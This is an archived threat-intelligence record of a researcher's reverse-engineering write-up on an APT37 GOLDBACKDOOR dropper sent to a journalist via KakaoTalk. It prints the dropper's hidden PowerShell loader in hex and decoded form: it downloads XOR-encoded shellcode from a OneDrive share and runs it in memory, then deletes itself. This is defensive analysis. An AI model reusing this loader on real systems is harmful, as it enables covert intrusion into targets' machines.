{ "id": "181408f4-78d3-4878-8533-1c1f9791e34c", "created_at": "2026-04-06T00:18:10.064363Z", "updated_at": "2026-04-10T03:27:23.462742Z", "deleted_at": null, "sha1_hash": "7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92", "title": "REarchive: Reverse Engineering APT37's GOLDBACKDOOR dropper", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1519721, "plain_text": "REarchive: Reverse Engineering APT37's GOLDBACKDOOR\r\ndropper\r\nBy Ovi\r\nPublished: 2023-09-25 · Archived: 2026-04-05 18:28:08 UTC\r\nPlease note: The sample covered in this report is from September 2022-January 2023. I have covered\r\nthis sample for archiving purposes and does not pertain to a known recent threat campaign, though\r\nthe techniques covered may still apply.\r\nRE:archive\r\nI had this idea to archive the reverse engineering of malware or exploits of historic or prior campaigns by APT\r\ngroups. Of course, were possible, I want to cover malware and exploits of current samples, but sometimes this is\r\nnot possible. Either, it's too sensitive to disclose, it wasn't found in my network of people or the sample has not\r\nbeen published. So much of content produced by TI corporations on malware samples is either high-level,\r\nabstracted or sometimes does not disclose samples for reverse engineering. Along my travels, I'm often revisiting\r\nold samples to understand TTPs or evolutions. Retrohunting, is also retroreverse engineering I say. So with this, I\r\nwanted to create a space for this type of content on this website, I call this project the RE:archive. I hope here, I\r\ncan find a space that will reverse engineer older samples related to APT groups, where they haven't been covered\r\nbefore or simply it is of genuine interest.\r\nIntroduction to GOLDBACKDOOR dropper\r\nJournalists have been a predominant target for intelligence operations by threat groups supported by nation state\r\nactors. Particularly, threat actors from the Democratic People’s Republic of Korea (DPRK) have adopted\r\nconsistent and sophisticated efforts to target individuals, such as activists and journalists that speak out against the\r\nregime over the last decade.\r\nAs an independant researcher, I work with non-profit groups supporting human rights activists, journalists, and\r\nanybody at risk from digital threats. And recently in going back through my samples, I found a number of samples\r\nI hadn't really discussed indepth before - which sparked the REArchive project. Once such sample was this, a\r\nGOLDBACKDOOR dopper campaign, that was seen in January 2023. This is a relatively trivial malware\r\ndropper, but it hasn't really been covered much publically. Whilst the time sensitivity of releasing a technical\r\nreport of this malware has lapsed, I believe that is still valuable to document and archive the reverse engineering\r\nof this malware, since I don't believe there has been much detailed technical reporting publically on it (other than\r\nStairwells). My intention here is to cover what this malware does/did as a retrospective analysis; it may support\r\nfuture defence of civil society and journalists.\r\nDistribution\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 1 of 13\n\nThe sample covered in this report was passed to us from an journalist who had received a message within the\r\nKakaotalk Messaging App. The message discussed the exchange of private and sensitive information related to\r\nimportant figures in the context of North Korean related activities in South Korea.\r\nThe sender, asked the journalists to look at the files attached in the message (.zip file). Some of the content within\r\nthe zip package contained private and sensitive documentation and images relating to individuals pertinent to\r\nNorth Korean/South Korean politics.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 2 of 13\n\nContained with the media content is a file, with the filename title:\r\n개인정보_처리방침_신구대조표_v1_0_220805.pdf.pif.\r\nGOLDBACKDOOR dropper\r\nFile type is a PIF file (Program Information File): PIF-files (Program Information File) are the standard Windows\r\nfiles that are used by the operating system to store information about start-up properties for DOS-applications.\r\nPIF-files contain the necessary application's details, such as its name, size, location, creation and modification\r\ndate, default screen size, memory usage, idle sensitivity, etc. This Windows feature enables users to avoid making\r\nmultiple adjustments to the DOS-application operating mode each time they are started. It is enough to set up the\r\nprogram once and save the configuration to a PIF-file.\r\nWhen looking at the entropy of the file, we notice a large rsrc section.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 3 of 13\n\nThis is due to files contained here, which include a PDF and icons for PDF filetypes.\r\nThe sample itself contains many anti-* techniques, however many of these are as a result of the compiler. Because\r\nof this, you should note that this is typically standard of VS compilations. I included a review of these for\r\ncontextual understanding of compilation settings of this malware and to support other reverse engineers in\r\nidentifying these common attributes in malware.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 4 of 13\n\nWhen debugging the sample, we get anti-debug checks. Of which include Visual Studio Compilers functionality\r\nsuch as __scrt_initalize_crt(1). This is common with VS compilations.\r\nIt checks for CPUID and if processor feature PF_XMMI64_INSTRUCTIONS_AVAILABLE is present on the\r\nimpacted system. If enabled, the malware knows that the SSE2 instruction set is available and more complex\r\nmathematical operations are possible.\r\nIf it’s not available, it calls IsProcessorFeatureSetPresent(0x17u) to check __fastfail support before a call to\r\nIsDebuggerPresent \u0026 UnhandledExceptionFilter to check if an exception occurs and no exception handler is\r\nregistered, checking for a debugger.\r\nOnce anit-* checks are made and various compiler checks, winmain is executed.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 5 of 13\n\nWe first see a call to FindResourceA, where the malware looks for the custom binary resource containing the\r\nresources, we noted earlier at 0x67.\r\nOnce it finds, loads and locks the resource, we see a handle to the executable and a region allocation.\r\nFollowing this a call to memmove to copy resource data to new allocated region.\r\nIt then makes a call to GetModuleFileNameW, this returns the current location of where the malware is running\r\nfrom in order for it to decrypt a list of strings that will be used to create a filename for the PDF it’s extracting next\r\nfrom the resources.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 6 of 13\n\nWe then see an additional FindResourceA get a handle to the PDF file contained within rsrc.\r\nCalling GetTempPathW, the malware looks for the users temp directory to write the PDF file to with its generated\r\nfilename.\r\nThis is followed by some appending and a call to wfopen \u0026 fwrite to write the PDF to the temp path.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 7 of 13\n\nWhen the malware executes, the file is written to the temp directory. With the file name: ‘개인정보 처리방침 신\r\n구대조표_v1.0_220805.pdf’\r\nThe dropper then uses the ShellExecuteW function with command “open” to open the file, which opens the PDF\r\nfile on whatever default app the user has configured to open PDF files with. This process results in the user\r\nthinking they simply loaded a PDF file when originally clicking on the executable.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 8 of 13\n\nFollowing the loading of this, an additional GetTempPath is called where a BAT script is written.\r\nThe content of the BAT script is then written using fwrite, where a Powershell script is written from a buffer\r\ncontained in the binary.\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 9 of 13\n\nThis is followed by a ShellExecuteW call with command open of the BAT script.\r\nOpening the full contents of the BAT script, we see the following script is executed:\r\nc:\\\\Windows\\\\SysWOW64\\\\cmd.exe /c powershell -windowstyle hidden -command \"$qwts\r\n=\"$pas2=\"\"\"5B4E65742E53657276696365506F696E744D616E616765725D3A3A53656375726974795026F746F636F6C3D5B456E756D5D3A\r\nF636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C3332\r\nE646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C41\r\nC6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D62657244\r\n566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162\r\n03D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C69632073746174\r\n9632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E\r\n420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D\r\nD656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546\r\n72753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24\r\n43D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F752\r\n6148523063484D364C7938785A484A324C6D317A4C335576637946426146464E55445A6C5A7A686855\r\nB5A694E3078564D554E505132597A654535765646555F5A5431775A326C6961554D2F726F6F742F636\r\n6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075\r\n26C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7\r\n50747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E74\r\n074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E202\r\n6262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F7274\r\n8226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745\r\n74722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B27\r\nB246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 10 of 13\n\n65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E48\r\n561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B247\r\n6D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C\r\n16C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D2\r\n303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E677468\r\nB30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6\r\n742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E\r\n465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682\r\n312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B74\r\n8726F7720313B7D63617463687B2468616E646C653D246363633A3A437265617465546872656164283\r\n2C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A6563742824\r\n8616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C65657020313\r\n3B24653D3131323B7D7D7768696C65282465202D657120313132293B\"\"\";$mdnp=\"\"\"\"\"\";for($i=0;\r\ni -le $pas2.Length-2;$i=$i+2){$NTMO=$pas2[$i]+$pas2[$i+1];$mdnp= $mdnp+[char\r\n([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock\r\n([Scriptblock]::Create($mdnp));\";Invoke-Command -ScriptBlock\r\n([Scriptblock]::Create($qwts));\"\r\nDecoded this results in:\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072); $aa='[DllImport\r\n$b=Add-Type -MemberDefinition $aa -Name \"AAA\" -PassThru;\r\n$abab = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d\r\n$aab=Add-Type -MemberDefinition $abab -Name \"AAB\" -PassThru;\r\n$c = New-Object System.Net.WebClient; $d=\"https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBaFF\r\n$bb='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint\r\n$ccc=Add-Type -MemberDefinition $bb -Name \"BBB\" -PassThru; $ddd='[DllImport(\"kernel32.dll\")]public static extern\r\ndo {\r\ntry {\r\n$c.Headers[\"user-agent\"] = \"connnecting...\";\r\n$xmpw4=$c.DownloadData($d);\r\n$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100);\r\n$old = 0;\r\n $aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);\r\n for ($h = 1; $h -lt $xmpw4.Length; $h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw\r\n};\r\ntry{throw 1;}\r\ncatch{\r\n$handle=$ccc::CreateThread(0,0,$x0,0,0,0); $fff::WaitForSingleObject($handle, 500*1000);\r\n};\r\n$e=222;}\r\ncatch{\r\nsleep 11;\r\n$e=112;\r\n} } while($e -eq 112);\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 11 of 13\n\nThe victim’s machine will then spawn a command line process which subsequently executes the PowerShell\r\nscript. The script will then download and execute a shellcode payload (XOR encoded using the first byte as a key)\r\nstored in Microsoft OneDrive.\r\nFollowing this execution, the section stage shellcode is executed and the dropper calls vsprintf to execute\r\ncommand line argument “cmd.exe /C ping 1.1.1.1 -n 1 -w 2000 \u003e Nul \u0026 Del /f /q \\”%s\\”” to delete itself.\r\nAt the time of writing, the second stage payload C2 was not live, thus we were unable to successfully pull the\r\nshellcode for analysis.\r\nConclusion\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 12 of 13\n\nDuring this analysis, I found close parallels and overlaps for this dropper with multiple samples I'd have received\r\nfrom human rights activists and journalists. Notably, the PowerShell script is a common utilization of APT37,\r\nwhere the methodology for its execution may change. This appears to be a common feature of\r\nGOLDBACKDOOR’s dropper.\r\nHuman rights activist and journalist who may be targeted by campaigns such as this should be extra vigilant when\r\nreceiving documents or executable by message or mail. Droppers like this, are intended to trick the victim into\r\nexecuting a file that will result in further stages of malware being delivered to the machine.\r\nIf you have been a victim or feel targeted by a threat group, you are welcome to reach out to me or organizations\r\nsuch as Interlab. If you are ever worried about targeting, or want to validate anything you think may be a digital\r\nthreat to you, we welcome you to contact us for support.\r\nIOC and sample\r\n4270815d05d95c9baaf79508a350b504f157e32fba5506b49aebe8e35182e52f\r\nAvailable on Bazaar or VirusTotal\r\nAbout this website\r\nI am Ovi, I am an independent researcher. My work is solely related to human \u0026 digital rights activism focusing\r\non reverse engineering, data privacy violations \u0026 surveillance from hostile government and private organizations\r\nthat threaten humanity. I work with non-profit groups and directly with those at risk. As an independent\r\nresearcher, getting my research, work and writings out can be hard, which is why I created this website. You can\r\nread more about this here. If you feel that you value this work, please consider subscribing, which will allow me\r\nto share my work directly with those who appreciate it without having to work with media organizations.\r\nSign up for [0x0v1]\r\nBlog of independent researcher Ovi Liber. Writings and research regarding hacking, security research and human\r\nrights. Covering APTs, gov'ts, surveillance, privacy violations \u0026 corporate injustice.\r\nNo spam. Unsubscribe anytime.\r\nSource: https://www.0x0v1.com/rearchive-goldbackdoor/\r\nhttps://www.0x0v1.com/rearchive-goldbackdoor/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.0x0v1.com/rearchive-goldbackdoor/" ], "report_names": [ "rearchive-goldbackdoor" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434690, "ts_updated_at": 1775791643, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92.pdf", "text": "https://archive.orkl.eu/7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92.txt", "img": "https://archive.orkl.eu/7bb8bcbb3ffeb178b653bbd85098d87fcd54ce92.jpg" } }